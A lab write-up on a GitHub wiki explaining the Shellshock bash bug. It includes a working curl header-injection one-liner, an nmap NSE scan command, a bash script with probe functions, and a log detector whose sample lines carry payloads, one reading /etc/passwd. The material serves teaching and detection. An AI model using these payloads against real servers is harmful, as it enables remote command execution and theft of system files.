ShellShock - Foren-Ken/tech-journal GitHub Wiki
Description
Shellshock (CVE-2014-6271 and its follow-on CVEs) is a bug in the way bash imports shell functions from its environment. When bash starts, any environment variable whose value begins with `() {` is parsed as an exported function definition. A vulnerable bash does not stop parsing at the closing brace of that function: whatever follows it in the same variable is executed immediately as a command. So an environment variable such as x='() { :;};
is not the end of the parsing for a vulnerable bash. This gives the well-known test:

```
x='() { :;}; echo vulnerable' bash -c "echo test"
```

On a vulnerable bash this prints `vulnerable` before `test`; a patched bash prints only `test`. The `echo vulnerable` can be replaced by any other OS command, and wherever an attacker controls an environment variable that a bash process inherits (CGI scripts, which receive HTTP request headers as `HTTP_*` environment variables, are the classic case) this becomes remote command execution.
Discovery
Lab 4.1 required us to use nmap's http-shellshock NSE script to test a CGI endpoint on port 80. The script places the payload in an HTTP request header and reports the host as vulnerable when the supplied command executes:

```
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" [IP ADDRESS]
```
Current Creations:
```
curl -H 'Test: () { :; }; echo ; echo ; [location of command] [argument(s)]' http://host/[vulnerable CGI path]
```

This one-liner sends a request whose `Test` header carries the payload `() { :; }; echo ; echo ; [location of command] [argument(s)]` to `http://host/[vulnerable CGI path]`. The web server hands the header to the CGI script as the environment variable `HTTP_TEST`; if the script is, or spawns, a vulnerable bash, the leading `() { :; }` is parsed as a function definition and the trailing command is executed, exactly as in the `x='() { :;}; echo vulnerable' bash -c "echo test"` test from the description. The two `echo`s print the blank line that terminates the HTTP response headers, so the command's output is returned in the response body instead of being discarded as an invalid header. The header name itself does not matter; `User-Agent`, `Cookie` and `Referer` are commonly used because servers reliably pass them through to CGI.
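As an added worked example (not code from this wiki page or the lab), the script below packages the pieces above into reusable functions: the local bash check from the description, the header construction behind the curl one-liner, a probe wrapper around curl, and a small access-log check for the `() {` prologue that a defender would run after reading this page. It assumes `bash` and `curl` are on PATH; the target host and CGI path are placeholders supplied by the caller, and the log lines are constructed samples.

```shell
#!/usr/bin/env bash
# Added example for this wiki page, not code from the original page.
# Assumes bash and curl are on PATH. Target host/path are caller-supplied
# placeholders; the log lines below are constructed samples.

# Local check. The exported variable looks like an exported function
# definition ("() { :;}") with a command appended. A vulnerable bash runs
# "echo vulnerable" while importing the function at startup; a patched bash
# ignores the trailing text and only runs the -c command.
shellshock_local_check() {
  local out
  out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null || true)
  case "$out" in
    *vulnerable*) echo "vulnerable";     return 0 ;;
    *)            echo "not vulnerable"; return 1 ;;
  esac
}

# Header value for the curl one-liner. The two echos emit the blank line
# that ends the HTTP response headers, so the command output is returned
# in the response body instead of being dropped as a malformed header.
# Usage: shellshock_header HEADER-NAME /path/to/cmd [args...]
shellshock_header() {
  local name="$1"
  shift
  printf '%s: () { :; }; echo; echo; %s' "$name" "$*"
}

# Send the probe and print the response body. Needs a live target, so it
# is only called interactively, e.g.:
#   shellshock_probe http://host/cgi-bin/status /usr/bin/whoami
shellshock_probe() {
  local url="$1"
  shift
  curl -s -H "$(shellshock_header User-Agent "$@")" "$url"
}

# Detection side: count access-log lines whose headers or URI carry the
# "() {" function prologue. Reads log lines on stdin and prints the count.
shellshock_log_hits() {
  grep -cE '\(\) *\{' || true
}

# Constructed sample log (combined log format); two of the three lines
# carry a Shellshock payload, in the User-Agent and Referer fields.
SAMPLE_LOG='10.0.0.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :; }; echo; echo; /usr/bin/id"
10.0.0.6 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "() {:;}; /bin/cat /etc/passwd" "curl/7.38.0"'

# Demo when run directly.
echo "local bash: $(shellshock_local_check)"
echo "header:     $(shellshock_header Test /usr/bin/whoami)"
echo "log hits:   $(printf '%s\n' "$SAMPLE_LOG" | shellshock_log_hits)"
```

Run `shellshock_probe http://host/[vulnerable CGI path] /usr/bin/whoami` against a lab target to reproduce the curl one-liner; if the response body contains the username, the CGI endpoint is exploitable. Pipe a real access log into `shellshock_log_hits` to see whether the same probe was ever sent to you.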